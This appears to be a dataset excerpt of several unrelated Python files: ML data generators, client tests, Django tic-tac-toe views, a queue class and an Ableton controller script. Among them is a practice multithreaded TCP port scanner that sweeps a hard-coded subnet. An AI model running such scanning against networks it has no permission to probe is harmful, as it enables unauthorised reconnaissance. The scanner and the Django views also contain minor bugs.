i1 = num_2_extract_mod * self.batch_size\n# i2 = num_2_extract_mod * self.batch_size + self.batch_size\n# raw_Y = h[self.label_key][i1:i2]\n# # black out edges from frame to frame\n# adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n# for atef in adjust_these_edge_frames:\n# # mask_ind = np.where(atef == all_edges)[1][0]\n# # out[atef] = out[atef] * (self.full_edges_mask[mask_ind]\n#\n# mask_ind = np.where(atef == all_edges)[1][0]\n# mask_ = self.full_edges_mask[mask_ind]\n# out[atef - i1][mask_] = -1\n# return out, raw_Y\n#\n# # gray mask(set array to -1 not 0 ),DONE\n# # doesnt fill the edges as expected, DONE\n# # outputs format 0-255 not -1 to 1 DONE this was just custom code not from image_tools\n# # need to test this with uneven frames\n# def __len__(self):\n# return len(self.file_inds_for_H5_extraction)\n#\n# def getXandY(self, num_2_extract):\n# \"\"\"\n#\n# Parameters\n# ----------\n# num_2_extract :\n#\n#\n# Returns\n# -------\n#\n# \"\"\"\n# rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n# return rgb_tensor, raw_Y\n#\n# def image_transform(self, raw_X):\n# \"\"\"input num_of_images x H x W, image input must be grayscale\n# MobileNetV2 requires certain image dimensions\n# We use N x 61 x 61 formated images\n# self.IMG_SIZE is a single number to change the images into, images must be square\n#\n# Parameters\n# ----------\n# raw_X :\n#\n#\n# Returns\n# -------\n#\n#\n# \"\"\"\n# rgb_batch = copy.deepcopy(raw_X)\n# # if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n# # rgb_batch = copy.deepcopy(raw_X)\n# # else:\n# # rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n# rgb_tensor = rgb_batch\n# # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n# rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2 #commented before\n# # rgb_tensor = tf.image.resize(rgb_tensor, (self.feature_len)) # resizing\n# # rgb_tensor = tf.cast(rgb_tensor, np.uint8)# un commented before\n# self.IMG_SHAPE = (self.feature_len)\n# return rgb_tensor\n\nclass ImageBatchGenerator_feature_array(keras.utils.Sequence):\n\n def __init__(self, time_length, batch_size, h5_file_list, label_key='labels', feature_len=None,\n label_index_to_lstm_len=None, edge_value=-1, remove_any_time_points_with_edges=True):\n \"\"\"\n\n Parameters\n ----------\n time_length : total time points\n batch_size : batch output for generator, if set to None then will default to all frames which may use all your RAM\n h5_file_list : list of h5 strings or single h5 string\n label_key : where y output comes from\n feature_len : length of the features per time point\n label_index_to_lstm_len : determines look back and look forward index refers to where the 'current' time point is\n within the range of look_back_len; e.g. look_back_len = 7 label_index_to_lstm_len = 3 (middle index of 7) then\n time point 0 will be at 3 and index 0, 1, 2 will be the past values and index 4, 5, 6 will be the future values.\n look_back_len = 7 label_index_to_lstm_len = 0 (first index) then current time point will be at index 0 and all\n other time point (1, 2, 3, 4, 5, 6) will be future values. Default is middle time point\n edge_value : what to replace the edge values with, when time shifting you will have edges with no value, this\n will replace those values with this number.\n remove_any_time_points_with_edges : if true then batch size will not be the actual batch size it will be batch\n size - the number of time points with edges in them, x and y will still match and this method is preferred for\n training due to it not including unknown values.\n \"\"\"\n assert time_length % 2 == 1, \"number of images must be odd\"\n if label_index_to_lstm_len is None:\n label_index_to_lstm_len = time_length // 2 # in the middle\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n if batch_size is None:\n batch_size = int(np.sum(num_frames_in_all_H5_files))\n\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n self.remove_any_time_points_with_edges = remove_any_time_points_with_edges\n self.label_key = label_key\n\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.label_index_to_lstm_len = label_index_to_lstm_len\n self.lstm_len = time_length\n self.feature_len = feature_len\n self.edge_value = edge_value\n if remove_any_time_points_with_edges:\n self.edge_value = np.nan\n print(\n 'remove_any_time_points_with_edges == True : forcing edge_value to np.nan to aid in removing these time points')\n\n self.get_frame_edges()\n # self.full_edges_mask = self.full_edges_mask - (self.lstm_len // 2 - self.label_index_to_lstm_len)\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n\n with h5py.File(H5_file, 'r') as h:\n b = self.lstm_len // 2\n tot_len = h['images'].shape[0]\n\n # assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n # tot_len - b - 1)\n\n i1 = num_2_extract_mod * self.batch_size - b\n i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n edge_left_trigger = abs(min(i1, 0))\n edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n x = h['images'][max(i1, 0):min(i2, tot_len)]\n if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n pad_shape = list(x.shape)\n pad_shape[0] = edge_left_trigger + edge_right_trigger\n pad = np.zeros(pad_shape).astype('float32')\n if edge_left_trigger > edge_right_trigger:\n x = np.concatenate((pad, x), axis=0)\n else:\n x = np.concatenate((x, pad), axis=0)\n\n s = list(x.shape)\n s.insert(1, self.lstm_len)\n out = np.zeros(s).astype('float32') # before was uint8\n Z = self.label_index_to_lstm_len - self.lstm_len // 2\n for i in range(self.lstm_len):\n i_temp = i\n i = i - Z\n i1 = max(0, b - i)\n i2 = min(s[0], s[0] + b - i)\n i3 = max(0, i - b)\n i4 = min(s[0], s[0] + i - b)\n # print('take ', i3, ' to ', i4, ' and place in ', i1, ' to ', i2)\n out[i1:i2, i_temp, ...] = x[i3:i4, ...]\n\n out = out[b:s[0] - b, ...]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n raw_Y = h[self.label_key][i1:i2]\n\n adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n b2 = b - self.label_index_to_lstm_len # used to adjust mask postion based on where the center value is\n for atef in adjust_these_edge_frames:\n mask_ind = np.where(atef == all_edges)[1][0]\n mask_ind = mask_ind - b2\n mask_ind = mask_ind % self.full_edges_mask.shape[0] # wrap around index\n\n mask_ = self.full_edges_mask[mask_ind]\n mask_ = mask_ == 1\n out_ind = atef + i1 - b2\n out_ind = out_ind % out.shape[0] # wrap around index\n out[out_ind][mask_] = self.edge_value\n\n s = out.shape\n out = np.reshape(out, (s[0], s[1] * s[2]))\n if self.remove_any_time_points_with_edges:\n keep_inds = ~np.isnan(np.mean(out, axis=1))\n out = out[keep_inds]\n raw_Y = raw_Y[keep_inds]\n\n return out, raw_Y\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n \"\"\"\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n # kept this cause this is the format of the image generators I know this is redundant\n rgb_batch = copy.deepcopy(raw_X)\n rgb_tensor = rgb_batch\n self.IMG_SHAPE = (self.feature_len)\n return rgb_tensor\n\n def get_frame_edges(self):\n self.all_edges_list = []\n b = self.lstm_len // 2\n\n s = [b * 2, self.lstm_len, self.feature_len]\n for H5_file in self.H5_file_list:\n with h5py.File(H5_file, 'r') as h:\n full_edges_mask = np.ones(s)\n tmp1 = np.arange(1, self.lstm_len)\n front_edge = tmp1[:self.label_index_to_lstm_len]\n back_edge = tmp1[:self.lstm_len - self.label_index_to_lstm_len - 1]\n\n edge_ind = np.flip(front_edge)\n for i in front_edge:\n # print(i - 1, ':', edge_ind[i - 1])\n # print(full_edges_mask[i - 1, :edge_ind[i - 1], ...].shape)\n # print('\\n')\n full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n\n edge_ind = np.flip(back_edge)\n for i in back_edge:\n # print(-i, -edge_ind[i - 1], ':')\n # print(full_edges_mask[-i, -edge_ind[i - 1]:, ...].shape)\n # print('\\n')\n full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n\n all_edges = []\n for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n all_edges.append(edges)\n\n all_edges = np.asarray(all_edges)\n self.all_edges_list.append(all_edges)\n full_edges_mask = full_edges_mask.astype(int)\n self.full_edges_mask = full_edges_mask == 0\n\n\ndef rename_h5_key_from_images_to_feature(h5_in):\n if isinstance(h5_in, list):\n for k in h5_in:\n rename_h5_key_from_images_to_feature(k)\n return\n\n if utils.h5_key_exists(h5_in, 'images'):\n print(\"\"\"'images' exists, changing it to 'FD__original'\"\"\")\n with h5py.File(h5_in, 'r+') as h:\n h['FD__original'] = h['images'][:]\n del h['images']\n else:\n print(\"\"\"'images' key does not exist, skipping\"\"\")\n\n\n# apply the below on the files and combine the things we need to combine\ndef combine_and_index_feature_data(h5s_to_combine, new_h5, label_key='labels', feature_key='FD__original'):\n h5c = h5_iterative_creator(new_h5,\n overwrite_if_file_exists=True,\n max_img_height=1,\n max_img_width=2048,\n close_and_open_on_each_iteration=True,\n color_channel=False,\n add_to_existing_H5=False,\n ignore_image_range_warning=False,\n dtype_img=h5py.h5t.IEEE_F32LE,\n dtype_labels=h5py.h5t.IEEE_F32LE)\n\n h5_lengths = []\n h5_inds_each = []\n inds_to_h5_file_names = []\n frame_nums_all = []\n for i, k in enumerate(tqdm(h5s_to_combine)):\n features = get_h5_key_and_concatenate(k, feature_key)\n y = get_h5_key_and_concatenate(k, label_key)\n\n h5c.add_to_h5(features, y)\n\n h5_lengths.append(len(y))\n h5_inds_each.append(np.arange(len(y)))\n inds_to_h5_file_names.append(np.zeros(len(y)).astype(int) + i)\n\n frame_nums_all.append(get_h5_key_and_concatenate(k, 'frame_nums').astype(int))\n\n h5s_to_combine = [n.encode(\"ascii\", \"ignore\") for n in h5s_to_combine]\n rename_h5_key_from_images_to_feature(new_h5)\n\n with h5py.File(new_h5, 'r+') as h:\n h['all_combined_h5_names'] = h5s_to_combine\n h['h5_lengths'] = np.asarray(h5_lengths).astype(int)\n h['h5_inds_all'] = np.arange(np.sum(h5_lengths)).astype(int)\n h['h5_inds_each'] = np.hstack(h5_inds_each).astype(int)\n h['inds_to_h5_file_names'] = np.hstack(inds_to_h5_file_names).astype(int)\n h['frame_nums'] = np.hstack(frame_nums_all).astype(int)\n h['has_data_been_randomized'] = False\n\n\ndef randomize_original_feature_data_and_inds(h5_in, rand_seed=1):\n assert rand_seed is not None, \"\"\"random seed can't be None, otherwise inds and data will not match!!!\"\"\"\n\n with h5py.File(h5_in, 'r+') as h:\n np.random.seed(rand_seed)\n h['h5_inds_all'][:] = np.random.permutation(h['h5_inds_all'][:])\n np.random.seed(rand_seed)\n h['h5_inds_each'][:] = np.random.permutation(h['h5_inds_each'][:])\n np.random.seed(rand_seed)\n h['inds_to_h5_file_names'][:] = np.random.permutation(h['inds_to_h5_file_names'][:])\n np.random.seed(rand_seed)\n h['FD__original'][:, :] = np.random.permutation(h['FD__original'][:, :])\n\n h['has_data_been_randomized'] = True\n\n\ndef check_if_permuted_h5_matches_og_h5_indexes(h5_1, ind):\n with h5py.File(h5_1, 'r') as h:\n i1 = np.where(h['h5_inds_all'][:] == ind)[0]\n x1 = h['inds_to_h5_file_names'][i1]\n print(h['all_combined_h5_names'][x1])\n print(h['h5_inds_all'][i1])\n print(h['h5_inds_each'][i1])\n print(x1)\n print(h['FD__original'][i1, :])\n\n\ndef get_rand_bool_inds(h5_in, split_segs=None, rand_seed=1, label_key='labels', write_to_h5=True):\n assert rand_seed is not None, \"\"\"random seed can't be None, otherwise inds and data will not match!!!\"\"\"\n if split_segs is None:\n split_segs = get_h5_key_and_concatenate(h5_in, 'split_segs')\n L = len(get_h5_key_and_concatenate(h5_in, label_key))\n np.random.seed(rand_seed)\n permuted_inds = np.random.permutation(np.arange(L))\n all_bool_inds = np.zeros([split_segs.shape[1], L], dtype=bool)\n for i, k in enumerate(split_segs.T):\n i1, i2 = k[0], k[1]\n perm_ind = np.sort(permuted_inds[i1:i2])\n permuted_inds[i1:i2] = perm_ind\n for kk in perm_ind:\n all_bool_inds[i, kk] = True\n if write_to_h5:\n utils.overwrite_h5_key(h5_in, 'permuted_inds', permuted_inds)\n utils.overwrite_h5_key(h5_in, 'all_bool_inds', all_bool_inds)\n return permuted_inds, np.asarray(all_bool_inds)\n\n\ndef divide_data_indexing(h5_in, split_names=['train', 'val', 'test'], split_percent_single=[0.7, 0.15, 0.15],\n max_len_each_set=10000, label_key='labels', write_to_h5=True):\n L = len(get_h5_key_and_concatenate(h5_in, label_key))\n num_divs = int(np.ceil(L / max_len_each_set))\n split_percent_single = list(split_percent_single/np.sum(split_percent_single))\n\n split_percentages = split_percent_single * num_divs\n array_inds = np.arange(L)\n split_percentages = split_percentages / np.sum(split_percentages)\n segment_inds = list(np.split(array_inds, np.ceil(L * np.cumsum(split_percentages[:-1])).astype('int')))\n tmp1 = [0]\n _ = [tmp1.append(k[-1]) for k in segment_inds]\n split_segs = np.asarray(utils.loop_segments(np.diff(tmp1), returnaslist=True))\n\n tmp2 = split_names * num_divs\n tmp3 = np.repeat(list(range(num_divs)), 3)\n split_segs_names = [i1 + '_num_' + str(i2) + '_percent_' + str(int(100*i3)) for i1, i2, i3 in\n zip(tmp2, tmp3, split_percent_single * num_divs)]\n if write_to_h5:\n utils.overwrite_h5_key(h5_in, 'split_segs', split_segs)\n utils.overwrite_h5_key(h5_in, 'split_segs_names', utils.convert_list_of_strings_for_h5(split_segs_names))\n\n return split_segs, split_segs_names\n\ndef convert_to_3lag(f, f2):\n \"\"\"\n Parameters\n ----------\n f : base file\n f2 : new 3lag file (doesn't exist yet\n \"\"\"\n assert f != f2, \"\"\"can't be the same file\"\"\"\n if os.path.isfile(f2):\n utils.open_folder(os.path.dirname(f2))\n assert False, \"\"\"\\nthe 3lag file you want to create already exists please delete it you you want to overwrite\\n\"\"\" + f2 + \"\\nopening folder...\"\n utils.stack_lag_h5_maker(f, f2, buffer=2, shift_to_the_right_by=0)\n utils.copy_over_all_non_image_keys(f, f2)\n","repo_name":"hireslab/whacc","sub_path":"whacc/image_tools.py","file_name":"image_tools.py","file_ext":"py","file_size_in_byte":88984,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"18298823426","text":"import optparse\nimport socket\nimport threading\nimport os, subprocess\nimport ipaddress\n\nglobal port_list, sbnet\n\nport_list= [22,80,257,443,4434,8080,19009]\nsbnet = ipaddress.ip_network('10.100.100.0/24')\n\nsocket.setdefaulttimeout(1)\nscreenLock = threading.Semaphore(value = 1)\n#os.popen('ulimit -n 5000').read()\nsubprocess.Popen('#!/bin/bash ulimit -n 6000', shell=True)\n\n\ndef connScan(ip, port):\n\t'''probe tcp socket connection by given port and ip'''\n\tconnskt = socket.socket(family=socket.AddressFamily.AF_INET, type=socket.SocketKind.SOCK_STREAM, proto=6)\n\tconnskt.settimeout(2)\n\t#screenLock.acquire()\n\ttry:\n\t\tconnskt.connect((ip, port))\n\t\tconnskt.send(b'Hello Python\\r\\n')\n\t\tres = connskt.recv(50)\n\t\t#hostname = socket.gethostbyaddr(ip)\n\t\tprint('port: %d is opening on host %s' %(port, ip))\n\t\t#print('result: %s' %res)\n\t\tconnskt.close()\n\texcept Exception as e: \n\t\t#screenLock.acquire()\n\t\t#print(e)\n\t\t#print('port: %d is not opened on host %s.' %(port, ip))\n\t\t#screenLock.release()\n\t\tpass\n\tfinally:\n\t\tscreenLock.release()\n\t\tconnskt.close()\n\ndef main():\n\tfor i in sbnet:\n\t\tfor p in port_list: \n\t\t\tt = threading.Thread(target=connScan, args=(str(i),int(p)))\n\t\t\tt.start()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liuxun931/py_practice_scripts","sub_path":"chapter02/chapter2-portScan.py","file_name":"chapter2-portScan.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69800752196","text":"\"\"\"Tests for the radar session object.\"\"\"\nimport os\nimport socket\nimport unittest\nfrom unittest import mock\n\nimport test_radar_common\nfrom mlre.radar import radar_common, radar_session\n\n\nclass TestRadarSession(unittest.TestCase):\n \"\"\"Tests for the radar session object.\"\"\"\n\n def setUp(self) -> None:\n \"\"\"Sets up the APIClient mock.\"\"\"\n self.patcher = mock.patch('mlre.radar.radar_api_client.APIClient')\n self.patched_api_client_type = self.patcher.start()\n\n def tearDown(self) -> None:\n \"\"\"Tears down the APIClient mock.\"\"\"\n self.patcher.stop()\n\n def test_server_default(self) -> None:\n \"\"\"Tests if the Session uses localhost by default.\"\"\"\n if 'RADAR_SERVER' in os.environ.keys():\n del os.environ['RADAR_SERVER']\n\n with radar_session.RadarSession():\n self.assertEqual(1, self.patched_api_client_type.call_count)\n\n # Test correct hostname\n self.assertEqual('https://127.0.0.1:5000/',\n self.patched_api_client_type.call_args[0][0])\n\n def test_server_environ(self) -> None:\n \"\"\"Tests if the Session uses the environment variable RADAR_SERVER.\"\"\"\n os.environ['RADAR_SERVER'] = test_radar_common.TEST_ENDPOINT\n\n with radar_session.RadarSession():\n self.assertEqual(1, self.patched_api_client_type.call_count)\n\n # Test correct hostname\n self.assertEqual(test_radar_common.TEST_ENDPOINT,\n self.patched_api_client_type.call_args[0][0])\n\n def test_reports_client_info(self) -> None:\n \"\"\"Tests if the Session reports client information after connecting.\"\"\"\n self.test_server_default()\n\n self.assertEqual(\n 1, self.patched_api_client_type.return_value.report_client_info.call_count)\n\n # Check for correctness of client info\n actual_client_info: radar_common.ClientInfo =\\\n self.patched_api_client_type.return_value.report_client_info.call_args[\n 0][0]\n expected_client_info = radar_common.ClientInfo(\n socket.gethostname(), os.environ) # type: ignore\n\n self.assertEqual(expected_client_info, actual_client_info)\n\n def test_reports_session_start_event(self) -> None:\n \"\"\"Tests if the Session reports a start event after connecting.\"\"\"\n if 'RADAR_SERVER' in os.environ.keys():\n del os.environ['RADAR_SERVER']\n\n with radar_session.RadarSession():\n self.assertEqual(\n 1, self.patched_api_client_type.return_value.report_event.call_count)\n\n # Check for correctness of start event\n actual_identifier: radar_common.EventIdentifier =\\\n self.patched_api_client_type.return_value.report_event.call_args[\n 0][0]\n expected_identifier = radar_common.EventIdentifier(\n severity=radar_common.Severity.INFO,\n location=\"mlre.radar.radar_session\",\n description=\"Session started\")\n\n self.assertEqual(expected_identifier, actual_identifier)\n\n def test_reports_session_end_event(self) -> None:\n \"\"\"Tests if the Session reports an end event when exiting the session.\"\"\"\n\n # Session should be concluded after this\n self.test_server_default()\n\n # 2 because it includes both start and end events\n self.assertEqual(\n 2, self.patched_api_client_type.return_value.report_event.call_count)\n\n # Check for correctness of end event\n actual_identifier: radar_common.EventIdentifier =\\\n self.patched_api_client_type.return_value.report_event.call_args[\n 0][0]\n expected_identifier = radar_common.EventIdentifier(\n severity=radar_common.Severity.INFO,\n location=\"mlre.radar.radar_session\",\n description=\"Session ended\")\n\n self.assertEqual(expected_identifier, actual_identifier)\n","repo_name":"cabrust/mlre","sub_path":"tests/test_radar_session.py","file_name":"test_radar_session.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6622986032","text":"from django.shortcuts import render\r\n# from bs4 import BeautifulSoup\r\nfrom .models import Score\r\n# import pyrebase\r\n# Create your views here.\r\ndef index(request):\r\n return render(request,\"index.html\")\r\ndef game(request):\r\n\r\n return render(request,'game.html')\r\ndef submit(request):\r\n if request.method==\"POST\":\r\n \r\n #----------------------------------initail logic--------------------------------------------\r\n # a=[request.POST['1'],request.POST['2'],request.POST['3']\r\n # ,request.POST['4'],request.POST['5'],request.POST['6']\r\n # , request.POST['7'],request.POST['8'],request.POST['9']]\r\n # print(a)\r\n one=request.POST['winner']\r\n print(one)\r\n n1=request.POST['name1']\r\n n2=request.POST['name2']\r\n print(n1+\" \"+n2)\r\n #----------------------------------initail logic--------------------------------------------\r\n # if a[0] == '1' and a[4] == '1' and a[8] == '1' or a[6] == '1' and a[4] == '1' and a[2] == '1' or a[0] == '1' and a[1] == '1' and a[2] == '1' or a[3] == '1' and a[4] == '1' and a[5] == '1' or a[6] == '1' and a[7] == '1' and a[8] == '1' or a[2] == '1' and a[5] == '1' and a[8] == '1' or a[1] == '1' and a[4] == '1' and a[7] == '1' or a[0] == '1' and a[3] == '1' and a[6] == '1':\r\n # #checking possible 3 1's manually \r\n # win=n1+\" winner\"\r\n # score=Score(Name=n1,Won=True)\r\n # score.save()\r\n # win=n1+\" winner\"\r\n # score=Score(Name=n2)\r\n # score.save()\r\n # print(\"name1\")\r\n # elif ((a[0]=='0' and a[4]=='0' and a[8]=='0') or (a[6]=='0'and a[4]=='0' and a[2]=='0') or (a[0]=='0'and a[1]=='0' and a[2]=='0') or (a[3]=='0'and a[4]=='0' and a[5]=='0') or (a[6]=='0'and a[7]=='0' and a[8]=='0') or (a[2]=='0'and a[5]=='0' and a[8]=='0') or (a[1]=='0'and a[4]=='0' and a[7]=='0') or (a[0]=='0'and a[3]=='0' and a[5]=='0')):#checking possible 3 0's manually \r\n \r\n # win =n2+\" winner\"\r\n # score=Score(Name=n2,Won=True)\r\n # score.save()\r\n # win=n1+\" winner\"\r\n # score=Score(Name=n1)\r\n # score.save()\r\n # print(\"name2\")\r\n if n1==\"\":\r\n n1=\"Player 1\"\r\n if n2==\"\":\r\n n=\"Player 2\"\r\n \r\n \r\n if one=='X':\r\n win = n1 + \" winner\"\r\n # score = Score(Name=n1, Won=True)\r\n # score.save()\r\n # score = Score(Name=n2)\r\n # score.save()\r\n \r\n if n1 !=\"Player 1\":\r\n try:\r\n g=Score.objects.get(Name=n1)\r\n print(g.Won)\r\n g.Won=g.Won+1\r\n g.save()\r\n except:\r\n g=Score(Name=n1,Won=1,Lost=0)\r\n g.save()\r\n if n2 !=\"Player 1\":\r\n try:\r\n g=Score.objects.get(Name=n2)\r\n print(g.Lost)\r\n g.Lost=g.Lost+1\r\n g.save()\r\n except:\r\n g=Score(Name=n2,Won=0,Lost=1)\r\n g.save()\r\n \r\n\r\n elif one=='O':\r\n win = n2 + \" winner\"\r\n # score = Score(Name=n2, Won=True)\r\n # score.save()\r\n # score = Score(Name=n1)\r\n # score.save()\r\n if n2 !=\"Player 1\":\r\n try:\r\n g=Score.objects.get(Name=n2)\r\n print(g.Won)\r\n g.Won=g.Won+1\r\n g.save()\r\n except:\r\n g=Score(Name=n2,Won=1,Lost=0)\r\n g.save()\r\n if n1 !=\"Player 1\":\r\n try:\r\n g=Score.objects.get(Name=n1)\r\n print(g.Lost)\r\n g.Lost=g.Lost+1\r\n g.save()\r\n except:\r\n g=Score(Name=n1,Won=0,Lost=1)\r\n g.save()\r\n print(\"name2\")\r\n else :\r\n win=\"draw match\"\r\n m={\"w\":win}\r\n return render(request,'winner.html',m)\r\n\r\ndef view(request):\r\n scoreall=Score.objects.all\r\n msg={\r\n \"scoreall\":scoreall\r\n }\r\n return render(request,\"view.html\",msg)","repo_name":"AnveshBemore/tictactoedjango","sub_path":"dbtictactoe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15796052874","text":"import threading\nimport queue\n\n\nclass BytecountLimitedQueue(object):\n \"\"\"Looks like a Queue, but limits the total number of bytes in the queue.\n\n We parametrize the Queue with a function that decides how many bytes are in a\n given message.\n \"\"\"\n\n def __init__(self, bytecountFunction, maxBytes=None):\n self._bytecountFunction = bytecountFunction\n self._canPushCondition = threading.Condition(threading.Lock())\n self._underlyingQueue = queue.Queue()\n self.totalBytes = 0\n self.maxBytes = None\n\n def pendingCount(self):\n return self._underlyingQueue.qsize()\n\n def setMaxBytes(self, bytecount):\n self.maxBytes = bytecount\n\n with self._canPushCondition:\n self._canPushCondition.notify_all()\n\n def put(self, msg, block=True, allowWriteWhileOverLimit=False):\n with self._canPushCondition:\n msgLen = self._bytecountFunction(msg)\n\n if not allowWriteWhileOverLimit:\n if block:\n while self.isBlocked():\n self._canPushCondition.wait()\n\n elif self.isBlocked():\n raise queue.Full()\n\n self.totalBytes += msgLen\n self._underlyingQueue.put(msg)\n\n def isBlocked(self):\n return self.maxBytes is not None and self.totalBytes >= self.maxBytes\n\n def get(self, timeout=None):\n msg = self._underlyingQueue.get(timeout=timeout)\n\n with self._canPushCondition:\n blocked = self.isBlocked()\n\n self.totalBytes -= self._bytecountFunction(msg)\n\n if blocked != self.isBlocked():\n self._canPushCondition.notify_all()\n\n return msg\n","repo_name":"APrioriInvestments/object_database","sub_path":"object_database/bytecount_limited_queue.py","file_name":"bytecount_limited_queue.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"3325804613","text":"# Embedded file name: C:\\ProgramData\\Ableton\\Live 9 Suite\\Resources\\MIDI Remote Scripts\\Maschine_MK3\\TrackMode.py\n# Compiled at: 2017-09-17 14:33:24\nimport Live\nfrom _Framework.ControlSurface import ControlSurface, _scheduled_method\nfrom _Framework.InputControlElement import *\nfrom _Framework.ButtonElement import *\nfrom _Framework.CompoundComponent import CompoundComponent\nfrom MidiMap import debug_out, toHSB\nfrom _Framework.SubjectSlot import subject_slot\nfrom Constants import *\nfrom MaschineMode import MaschineMode\n\nclass TrackHandler(CompoundComponent):\n __index = None\n __button = None\n __track = None\n __action = None\n __use_track_color = True\n __active = False\n\n def __init__(self, index, *a, **k):\n super(TrackHandler, self).__init__(*a, **k)\n self.__index = index\n\n def set_track_button(self, button):\n self.__button = button\n\n def release_button(self):\n self.__button = None\n return\n\n def set_no_track_action(self, action):\n if self.__action:\n self.__button.remove_value_listener(self.__action)\n self.__action = action\n self.__button.add_value_listener(self.__action, True)\n self.__active = True\n\n def assign_track(self, track):\n if self.__action:\n self.__button.remove_value_listener(self.__action)\n if track:\n self.__track = track\n self.__action = self._track_action\n self.__button.add_value_listener(self.__action, True)\n self._handle_color_changed.subject = self.__track\n self.__active = True\n else:\n self.__track = None\n self.__action = None\n self.__active = False\n return\n\n def unbind(self):\n if self.__action:\n self.__button.remove_value_listener(self.__action)\n if self.__track:\n self._handle_color_changed.subject = None\n self.__action = None\n self.__track = None\n self.__active = False\n return\n\n def _track_action(self, value, button):\n if value == 0:\n self.canonical_parent.handle_track_select(self.__track)\n\n def update_value(self):\n pass\n\n def send_color(self, value=0):\n if not self.__active:\n return\n if self.__track:\n color = toHSB(self.__track.color)\n self.__button.send_color_direct(color[self.__track != self.song().view.selected_track and 1 or 0])\n else:\n self.__button.send_color_direct(0)\n\n @subject_slot('color')\n def _handle_color_changed(self):\n if not self.__active:\n return\n if self.__track and self.__use_track_color:\n self.send_color()\n\n\nclass TrackMode(MaschineMode):\n __track_handlers = None\n __mode = SEL_MODE_SELECT\n\n def __init__(self, *a, **k):\n super(TrackMode, self).__init__(*a, **k)\n self.__track_handlers = [ TrackHandler(idx) for idx in range(16) ]\n self._handle_selection.subject = self.song().view\n self._tracks_change.subject = self.song()\n self._visible_changed.subject = self.song()\n\n @subject_slot('selected_track')\n def _handle_selection(self):\n if not self._active:\n return\n if self.__mode == SEL_MODE_SELECT:\n for i in range(8):\n self.__track_handlers[i].send_color()\n\n @subject_slot('tracks')\n def _tracks_change(self):\n if not self._active:\n return\n self._assign_tracks()\n self.refresh()\n\n @subject_slot('visible_tracks')\n def _visible_changed(self):\n if not self._active:\n return\n self._assign_tracks()\n self.refresh()\n\n def init_elements(self):\n for button, (column, row) in self.canonical_parent._bmatrix.iterbuttons():\n if button:\n index = row * 4 + column\n self.__track_handlers[index].set_track_button(button)\n\n def navigate(self, direction, modifier, alt_modifier=False):\n pass\n\n def get_color(self, value, column, row):\n return (4, 7)[value > 0 and 1 or 0]\n\n def get_mode_id(self):\n return TRACK_MODE\n\n def refresh(self):\n if self._active:\n for handler in self.__track_handlers:\n handler.send_color()\n\n def notify(self, blink_state):\n if blink_state == 0 or blink_state == 2:\n pass\n\n def notify_mono(self, blink_state):\n pass\n\n def gettrack(self, index, off):\n tracks = self.song().visible_tracks\n if index + off < len(tracks):\n return tracks[index + off]\n return\n\n def _deassign(self):\n for handler in self.__track_handlers:\n handler.unbind()\n\n def _assign_tracks(self):\n trackoff = self.canonical_parent._session.track_offset()\n for i in range(16):\n handler = self.__track_handlers[i]\n handler.unbind()\n if i < 8:\n track = self.gettrack(i, trackoff)\n if track is None:\n handler.set_no_track_action(self.empty_action)\n else:\n handler.assign_track(track)\n 